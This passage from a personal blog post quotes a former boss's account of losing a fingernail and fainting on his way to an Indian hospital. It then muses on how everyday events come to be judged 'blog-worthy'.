blog. Sean is an old boss and he and his wife Paige are saving the children of India. Yeah, chew on that over breakfast. Needless to say, they are often enjoying adventure after adventure. Sean’s most recent blog details his fingernail loss – details of which may cause you to get a little sick. Maybe the best line of the whole post is:
” …fingernail-less and bleeding finger, in and out of consciousness, lying in the dirt in front of an Indian hospital, an increasing amount of brown looky-loo strangers gathering around the feeble white man, wishing my wife was by my side and wondering what exactly was awaiting me inside those hospital doors.”
Did I also mention how he passed out on the back of a MOVING motorcycle on his way to the hospital?
My second favorite line in the post was this:
“It was about now, lying on my back fully conscious and comforted by the undivided attention of close to ten hospital employees in a noticeably sterile environment, that I started to think, “This is gonna make a great blog.””
I laughed out loud. I’ve been there, so many times.

Cat riding on a dog in the city! No joke. But this was pre-iPhone…..so there were no pictures….and I didn’t blog about it. But if this happened recently, I’d be all over it.
You get the idea. Events in life have now become blog-worthy or not-blog-worthy! I can’t decide if this is a good thing or a bad thing. On one hand, it really helps you make lemonade from lemons. On the other, it sucks to have a life that’s un-blog-worthy or a life you feel might be un-blog-worthy. Thankfully, I’ve got enough material to keep me going a bit longer!
